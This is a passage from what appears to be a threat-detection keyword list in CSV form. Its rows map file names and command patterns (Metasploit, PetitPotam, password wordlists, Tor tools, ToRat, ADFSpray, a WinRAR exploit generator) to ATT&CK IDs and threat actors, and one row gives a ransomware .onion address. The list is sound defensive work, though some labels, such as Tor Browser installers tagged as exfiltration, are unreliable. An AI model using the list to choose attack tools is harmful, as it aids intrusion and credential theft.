"*tomcat_mgr_default_userpass.txt*",".{0,1000}tomcat_mgr_default_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61457"
"*tomcat-rootprivesc-deb.sh*",".{0,1000}tomcat\-rootprivesc\-deb\.sh.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","1","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","61458"
"*tomcat-rootprivesc-deb.sh*",".{0,1000}tomcat\-rootprivesc\-deb\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","61459"
"*tomcatWarDeployer -v -x -p * -H * ",".{0,1000}tomcatWarDeployer\s\-v\s\-x\s\-p\s.{0,1000}\s\-H\s.{0,1000}\s","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","61460"
"*Tool-PassView*",".{0,1000}Tool\-PassView.{0,1000}","offensive_tool_keyword","Tool-PassView","Password recovery or exploitation","T1003 - T1021 - T1056 - T1110 - T1212","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/password_recovery_tools.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","61464"
"*tools/ligolo*",".{0,1000}tools\/ligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","61466"
"*top100_sublist.txt*",".{0,1000}top100_sublist\.txt.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","N/A","6","10","1355","197","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z","61467"
"*top1000_sublist.txt*",".{0,1000}top1000_sublist\.txt.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","N/A","6","10","1355","197","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z","61468"
"*Top109Million-probable-v2.txt*",".{0,1000}Top109Million\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","9","10","8895","1608","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z","61469"
"*Top12Thousand-probable-v2.txt*",".{0,1000}Top12Thousand\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","9","10","8895","1608","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z","61470"
"*Top1575-probable-v2.txt*",".{0,1000}Top1575\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","9","10","8895","1608","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z","61471"
"*Top1pt6Million-probable-v2.txt*",".{0,1000}Top1pt6Million\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","9","10","8895","1608","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z","61472"
"*Top207-probable-v2.txt*",".{0,1000}Top207\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","9","10","8895","1608","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z","61473"
"*Top29Million-probable-v2.txt*",".{0,1000}Top29Million\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","9","10","8895","1608","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z","61474"
"*Top2Billion-probable-v2.txt*",".{0,1000}Top2Billion\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","9","10","8895","1608","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z","61475"
"*Top304Thousand-probable-v2.txt*",".{0,1000}Top304Thousand\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","9","10","8895","1608","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z","61476"
"*Top353Million-probable-v2.txt*",".{0,1000}Top353Million\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","9","10","8895","1608","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z","61477"
"*topotam.exe*",".{0,1000}topotam\.exe.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","61478"
"*topotam/PetitPotam*",".{0,1000}topotam\/PetitPotam.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","61479"
"*top-usernames-shortlist.txt*",".{0,1000}top\-usernames\-shortlist\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","61480"
"*tor --DataDirectory *",".{0,1000}tor\s\-\-DataDirectory\s.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","61481"
"*tor -f .configs/*-torrc*",".{0,1000}tor\s\-f\s\.configs\/.{0,1000}\-torrc.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway","T1090 - T1095 - T1573","TA0005","N/A","N/A","Defense Evasion","https://github.com/GouveaHeitor/nipe","1","0","N/A","N/A","9","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","61482"
"*tor@default.service*",".{0,1000}tor\@default\.service.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux #servicename","N/A","10","10","N/A","N/A","N/A","N/A","61483"
"*tor_hiddenservices.rb*",".{0,1000}tor_hiddenservices\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61484"
"*tor_services.py*",".{0,1000}tor_services\.py.{0,1000}","offensive_tool_keyword","tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0005 - TA0010 - TA0011","N/A","Dispossessor - APT28 - APT29 - Leviathan","Defense Evasion","https://github.com/r0oth3x49/Tor","1","1","#linux","N/A","N/A","2","156","42","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z","61485"
"*tor2socks*",".{0,1000}tor2socks.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux #content","N/A","10","10","N/A","N/A","N/A","N/A","61486"
"*tor2web start*",".{0,1000}tor2web\sstart.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61487"
"*tor2web stop*",".{0,1000}tor2web\sstop.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61488"
"*tor2web.pid*",".{0,1000}tor2web\.pid.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61489"
"*tor2web.service*",".{0,1000}tor2web\.service.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61490"
"*tor2web/Tor2web*",".{0,1000}tor2web\/Tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61491"
"*tor2web_notification_form*",".{0,1000}tor2web_notification_form.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61492"
"*tor2web-cert.pem*",".{0,1000}tor2web\-cert\.pem.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61493"
"*tor2web-default.conf*",".{0,1000}tor2web\-default\.conf.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61494"
"*tor2web-dh.pem*",".{0,1000}tor2web\-dh\.pem.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61495"
"*tor2web-globaleaks.conf*",".{0,1000}tor2web\-globaleaks\.conf.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61496"
"*tor2web-hidden*",".{0,1000}tor2web\-hidden.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61497"
"*tor2web-intermediate.pem*",".{0,1000}tor2web\-intermediate\.pem.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61498"
"*tor2web-key.pem*",".{0,1000}tor2web\-key\.pem.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61499"
"*tor2web-visible*",".{0,1000}tor2web\-visible.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61500"
"*TORAnonymizer.ps1*",".{0,1000}TORAnonymizer\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","61501"
"*TorBrowser-*macos_ALL.dmg*",".{0,1000}TorBrowser\-.{0,1000}macos_ALL\.dmg.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","#macos","N/A","9","10","N/A","N/A","N/A","N/A","61502"
"*torbrowser-install-*_ALL.exe",".{0,1000}torbrowser\-install\-.{0,1000}_ALL\.exe","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","61503"
"*torbrowser-install-win*.exe*",".{0,1000}torbrowser\-install\-win.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","61504"
"*torbrowser-install-win64*",".{0,1000}torbrowser\-install\-win64.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","61505"
"*tor-browser-linux*_ALL.tar.xz*",".{0,1000}tor\-browser\-linux.{0,1000}_ALL\.tar\.xz.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","#linux","N/A","9","10","N/A","N/A","N/A","N/A","61506"
"*torEd25519*",".{0,1000}torEd25519.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","61507"
"*tor-geoipdb:all*",".{0,1000}tor\-geoipdb\:all.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","61508"
"*tor-geoipdb:amd64*",".{0,1000}tor\-geoipdb\:amd64.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","61509"
"*torify curl *",".{0,1000}torify\scurl\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","torify is a wrapper for torsocks or tsocks and tor","10","10","N/A","N/A","N/A","N/A","61510"
"*torify ghaur *",".{0,1000}torify\sghaur\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","torify is a wrapper for torsocks or tsocks and tor","10","10","N/A","N/A","N/A","N/A","61511"
"*torify nuclei *",".{0,1000}torify\snuclei\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","torify is a wrapper for torsocks or tsocks and tor","10","10","N/A","N/A","N/A","N/A","61512"
"*torify sqlmap *",".{0,1000}torify\ssqlmap\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","torify is a wrapper for torsocks or tsocks and tor","10","10","N/A","N/A","N/A","N/A","61513"
"*torpastezr7464pevuvdjisbvaf4yqi4n7sgz7lkwgqwxznwy5duj4ad.onion*",".{0,1000}torpastezr7464pevuvdjisbvaf4yqi4n7sgz7lkwgqwxznwy5duj4ad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61514"
"*torproject.org/dist/torbrowser/*.*",".{0,1000}torproject\.org\/dist\/torbrowser\/.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","61515"
"*torproject.org/download/download/*",".{0,1000}torproject\.org\/download\/download\/.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - Black Basta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","61516"
"*--tor-proxy*--pwndb*",".{0,1000}\-\-tor\-proxy.{0,1000}\-\-pwndb.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","Reconnaissance","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","N/A","10","1139","106","2025-01-28T19:07:29Z","2020-04-07T22:25:38Z","61517"
"*TorPylle*",".{0,1000}TorPylle.{0,1000}","offensive_tool_keyword","TorPylle","A Python / Scapy implementation of the OR (TOR) protocol.","T1573 - T1572 - T1553 - T1041 - T1090","TA0002 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/cea-sec/TorPylle","1","0","N/A","N/A","N/A","1","98","21","2021-10-03T18:08:41Z","2013-07-23T11:38:39Z","61518"
"*TorServiceSetup*",".{0,1000}TorServiceSetup.{0,1000}","offensive_tool_keyword","tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0005 - TA0010 - TA0011","N/A","Dispossessor - APT28 - APT29 - Leviathan","Defense Evasion","https://github.com/r0oth3x49/Tor","1","0","#linux","N/A","N/A","2","156","42","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z","61519"
"*torsocks:amd64*",".{0,1000}torsocks\:amd64.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","61520"
"*Total number of passwords to test: *",".{0,1000}Total\snumber\sof\spasswords\sto\stest\:\s.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","N/A","1","87","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z","61521"
"*totally legit pdf.pdf*",".{0,1000}totally\slegit\spdf\.pdf.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","61522"
"*totally-not-meterpreter.7z*",".{0,1000}totally\-not\-meterpreter\.7z.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Data Exfiltration","https://github.com/0xtosh/dnskire","1","1","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","61523"
"*tothi/dll-hijack-by-proxying*",".{0,1000}tothi\/dll\-hijack\-by\-proxying.{0,1000}","offensive_tool_keyword","dll-hijack-by-proxying","Exploiting DLL Hijacking by DLL Proxying Super Easily","T1174 - T1574.007","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tothi/dll-hijack-by-proxying","1","1","N/A","N/A","7","5","498","103","2023-07-09T22:11:34Z","2020-07-08T18:11:17Z","61524"
